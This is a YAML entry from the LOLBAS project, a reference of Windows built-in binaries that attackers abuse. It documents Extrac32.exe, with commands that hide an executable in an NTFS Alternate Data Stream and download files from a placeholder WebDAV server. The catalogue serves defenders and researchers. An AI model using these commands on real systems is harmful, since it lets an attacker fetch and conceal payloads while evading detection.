1
0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-09-20 10:41:47 +02:00
LOLBAS/yml/OSBinaries/Extrac32.yml

25 lines
1.0 KiB
YAML
Raw Normal View History

2018-06-09 00:15:06 +02:00
---
Name: Extrac32.exe
Description: Add ADS, Download
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.'
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.'
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Description: 'Copy the source file to the destination file and overwrite it.'
Full Path:
- c:\windows\system32\extrac32.exe
- c:\windows\sysWOW64\extrac32.exe
Code Sample: []
Detection: []
Resources:
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- https://twitter.com/egre55/status/985994639202283520
Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55